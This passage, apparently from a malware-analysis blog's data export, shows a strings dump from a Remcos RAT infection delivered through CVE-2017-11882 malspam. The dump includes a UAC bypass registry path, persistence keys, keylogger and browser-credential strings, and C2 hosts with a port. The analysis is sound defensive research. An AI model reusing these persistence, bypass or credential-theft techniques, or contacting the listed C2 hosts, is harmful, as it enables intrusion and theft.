Files\r\nPSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\\r\nPUBLI\r\nublic\r\nSESSIONNAME=Console\r\nsfxcmd="C:\\Users\\Bill\\AppData\\Roaming\\namegh.exe"\r\nsfxname=C:\\Users\\Bill\\AppData\\Roaming\\namegh.exe\r\nSystemDrive=C:\r\nSystemRoot=C:\\Windows\r\nTEMP=C:\\Users\\Bill\\AppData\\Local\\Temp\r\nTMP=C:\\Users\\Bill\\AppData\\Local\\Temp\r\nUSERDOMAIN=Bill-PC\r\nUSERNAME=Bill\r\nUSERPROFILE=C:\\Users\\Bill\r\nWecVersionForRosebud.564=4\r\nwindir=C:\\Windows\r\nwindows_tracing_flags=3\r\nwindows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log\r\n__COMPAT_LAYER=ElevateCreateProcess\r\nTcpip\r\nPsched\r\nPaYtPaYt\r\nTcpip\r\n! #!%"'#)$+%-&\/'1(3)5*7+9,;-=.?\/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?\r\n<8<8<\r\n!This program cannot be run in DOS mode.\r\n\r\n$\r\nRich\r\n.text\r\n`.rdata\r\n@.data\r\n.rsrc\r\n\r\nCloseChat\r\nGetMessage\r\nDisplayMessage\r\nSystemDrive\r\ncmd.exe\r\nopen\r\neventvwr.exe\r\nSoftware\\Classes\\mscfile\\shell\\open\\command\r\norigmsc\r\nmscfile\\shell\\open\\command\r\nntdll\r\nRtlGetNtVersionNumbers\r\nSoftware\\Classes\\mscfile\\shell\\open\\command\r\n[INFO]\r\nUploading file to C&C: \r\nOffline Keylogger Started\r\n\r\n[ \r\n ]\r\n\r\n\r\n{ User has been idle for \r\n minutes }\r\n\r\nOnline Keylogger Started\r\nOnline Keylogger Stopped\r\nOffline Keylogger Stopped\r\n\r\n{ %04i\/%02i\/%02i %02i:%02i:%02i - \r\n! }\r\n\r\n [F7] \r\n [F8] \r\n [F9] \r\n [F10] \r\n [F11] \r\n [F12] \r\n [F6] \r\n [Del] \r\n [F1] \r\n [F2] \r\n [F3] \r\n [F4] \r\n [F5] \r\n [Print] \r\n [End] \r\n [Start] \r\n [Left] \r\n [Up] \r\n [Right] \r\n [Down] \r\n [PagDw] \r\n [BckSp] \r\n [Tab] \r\n [Enter] \r\n\r\n [Pause] \r\n [Esc] \r\n [PagUp] \r\n [Ctrl + V]\r\n[Following text has been pasted from clipboard:]\r\n\r\n\r\n[End of clipboard text]\r\n\r\n\r\n [Ctrl + \r\n [LCtrl] \r\n [RCtrl] \r\n\r\n[Following text has been copied to clipboard:]\r\n\r\n\r\n[End of clipboard text]\r\n\r\n\r\n[Chrome StoredLogins found, cleared!]\r\n\r\n[Chrome StoredLogins not found]\r\nUserProfile\r\n\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\r\n\r\n[Chrome Cookies found, cleared!]\r\n\r\n[Chrome Cookies not found]\r\n\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies\r\n\r\n[Firefox StoredLogins cleared!]\r\n\\key3.db\r\n\\logins.json\r\n\r\n[Firefox StoredLogins not found]\r\n\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\r\n\r\n[Firefox cookies found, cleared!]\r\n\\cookies.sqlite\r\n\r\n[Firefox Cookies not found]\r\n\r\n[IE cookies cleared!]\r\n\r\n[IE cookies not found]\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\r\nCookies\r\n\r\n[Cleared all cookies & stored logins!]\r\n\r\nFunFunc\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\\r\nUserinit\r\nC:\\WINDOWS\\system32\\userinit.exe, \r\nSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\r\nShell\r\nexplorer.exe, \r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nfso.DeleteFile(Wscript.ScriptFullName)\r\nCreateObject("WScript.Shell").Run "cmd \/c ""\r\n""", 0\r\nfso.DeleteFile \r\nSet fso = CreateObject("Scripting.FileSystemObject")\r\n\r\nWScript.Sleep 1000\r\n\r\nTemp\r\n\\install.vbs\r\nfso.DeleteFolder "\r\nwend\r\n\r\nfso.DeleteFile "\r\nwhile fso.FileExists("\r\nOn Error Resume Next\r\n\r\n\\uninstall.vbs\r\nEXEpath\r\nUserinit\r\nC:\\WINDOWS\\system32\\userinit.exe\r\nShell\r\nexplorer.exe\r\nSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\r\n\\update.vbs\r\nCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n\\restart.vbs\r\nUserProfile\r\nAppData\r\nProgramFiles\r\n\\SysWOW64\r\n\\system32\r\nWinDir\r\nSystemDrive\r\n (32 bit)\r\n (64 bit)\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\r\nProductName\r\nRemcos_Mutex_Inj\r\nSoftware\\\r\nlicence_code.txt\r\nSetProcessDEPPolicy\r\nShell32\r\nIsUserAnAdmin\r\nGetComputerNameExW\r\nIsWow64Process\r\nkernel32\r\nkernel32.dll\r\nGlobalMemoryStatusEx\r\nGetModuleFileNameExW\r\nKernel32.dll\r\nPsapi.dll\r\nGetModuleFileNameExA\r\nProgram Files (x86)\\\r\nProgram Files\\\r\n\r\nMutex_RemWatchdog\r\n\\svchost.exe\r\nH.exe\r\ntemp_\r\n \/stext "\r\n[regsplt]\r\nHKCC\r\nHKCR\r\nHKCU\r\nHKLM\r\nShlwapi.dll\r\nSHDeleteKeyW\r\nDisconnected. Retrying connection...\r\n2.0.4 Pro\r\nname\r\n%I64u\r\nConnected to C&C!\r\nInitializing connection to C&C...\r\n\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\WinSAT\r\nPrimaryAdapterString\r\nPowrProf.dll\r\nSetSuspendState\r\nUnable to rename file!\r\nUnable to delete: \r\nDeleted file: \r\nFailed to download file: \r\nDownloaded file: \r\nDownloading file: \r\n[ERROR]\r\nFailed to upload file: \r\nUploaded file: \r\nExecuting file: \r\nViewing directory: \r\nsubsplt\r\nwndsplt\r\nSeShutdownPrivilege\r\nTemp\r\nntdll.dll\r\nNtUnmapViewOfSection\r\nUser32.dll\r\nGetCursorInfo\r\nDISPLAY\r\nimage\/jpeg\r\n@dat\r\nimage\/png\r\ntime_%04i%02i%02i_%02i%02i%02i\r\nwnd_%04i%02i%02i_%02i%02i%02i\r\nGetLastInputInfo\r\n%02i:%02i:%02i:%03i \r\nhttp\\shell\\open\\command\r\nabcdefghijklmnopqrstuvwxyz\r\nuser\r\nUninstallString\r\nInstallDate\r\nInstallLocation\r\nDisplayVersion\r\nPublisher\r\nDisplayName\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Uninstall\r\nTileWallpaper\r\nWallpaperStyle\r\nControl Panel\\Desktop\r\nRemcos\r\nGetConsoleWindow\r\nMsgWindowClass\r\nClose\r\n\r\n * Breaking-Security.Net\r\n\r\n\r\n * REMCOS v\r\nCONOUT$\r\nCreateThread\r\nGetModuleHandleA\r\nSleep\r\nExitThread\r\n\r\nC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe\r\n|cmd|\r\n<KKZ\r\n.Z]Zq@dAgT\r\ns8s8s\r\n<KKZ\r\n.Z]Zq@dAgT\r\npolextrading.ddns.net:1667:moron|poliy.kozow.com:1667:moron|\r\npoliy.kozow.com:1667:moron\r\n\\Progr\r\n\r\n[ Program Manager ]\r\n\r\nerties\r\ners\\\r\n\r\n[ 01644247 ]\r\n\r\nor ]\r\n\r\n1667\r\nht] \r\nnager\r\nktop\\enj.exe\\\r\n1644247\r\nditor\r\nktop\\enj.exe\\\r\npoliy.kozow.com\r\ns.net\r\nes(x\r\nmoron\r\nager\r\nrs ]\r\n\r\n247 ]\r\n\r\nor ]\r\n\r\nsonPr\r\n\r\n[ 01644247\r\nEditor\r\n ]\r\n\r\n[ Administrator: C:\\Windows\\System32\\cmd.exe\r\nt - Notepad++\r\n*C:\\Windows\\SysWOW64\\svchost.exe\r\n\r\n[ Process Monitor - Sysinternals: www.sysinternals.com ]\r\n\r\n\r\n[ Administrator: C:\\Windows\\System32\\cmd.exe ]\r\n\r\nNotepad++\r\nAdministrator: C:\\Windows\\System32\\cmd.exe\r\nkype ]\r\n\r\nd ]\r\n\r\ndministrator: C:\\Windows\\System32\\cmd.exe\r\n - Notepad++\r\ns8s8s\r\ncess Explorer - Sysinternals: www.sysinternals.com [Bill-PC\\Bill] ]\r\n [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Left]  [Right]  [Right] \r\nL:{z\r\n\r\n{ User has been idle for 16 minutes }\r\n\r\n{ User has been idle for 1 minutes }\r\n\r\n[ *Local Area Connection ]\r\n [BckSp] \r\n\r\n[ New Tab - Google Chrome ]\r\npacket total [Enter] \r\n\r\n[ packet total - Google Search - Google Chrome ]\r\n\r\n[ PacketTotal - A free, online PCAP analysis engine - Google Chrome ]\r\n\r\n[ Open ]\r\n\r\n[ PacketTotal - A free, online PCAP analysis engine - Google Chrome ]\r\n\r\n[ packet total - Google Search - Google Chrome ]\r\nnetwork total [Enter] \r\n\r\n[ network total - Google Search - Google Chrome ]\r\n\r\n[ NetworkTotal - Free Online Network Traffic Scanner - Google Chrome ]\r\n\r\n[ http:\/\/www.networktotal.com\/upload.php - Google Chrome ]\r\n\r\n[ NetworkTotal - Free Online Network Traffic Scanner - Google Chrome ]\r\n\r\n[Following text has been copied to clipboard:]\r\nFmt-W5SO9H\r\n[End of clipboard text]<\/pre>\n","protected":false},"excerpt":{"rendered":"
Yesterday while looking for some malspam, I came across some emails that used the CVE-2017-11882 exploit which leveraged an AutoIT script to launch the Remcos keylogger process which used some anti-sandbox techniques as well. For some more information about the CVE, please see the following links: http:\/\/researchcenter.paloaltonetworks.com\/2017\/12\/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild\/ http:\/\/reversingminds-blog.logdown.com\/posts\/3907313-fileless-attack-in-word-without-macros-cve-2017-11882 2018-02-17 REMCOS RAT FROM MALSPAM And some similarities to this post: 2017-06-23 LOKI BOT MALWARE USING CVE 2017-0199 as well. Most of the activity from this infection was on the host and not much at the network level from what I was able to determine. All the artifacts found from this investigation…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[25,24],"class_list":["post-1106","post","type-post","status-publish","format-standard","hentry","category-packet-analysis","tag-cve-2017-11882","tag-remcos"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1106","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1106"}],"version-history":[{"count":9,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1106\/revisions"}],"predecessor-version":[{"id":1127,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1106\/revisions\/1127"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1106"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}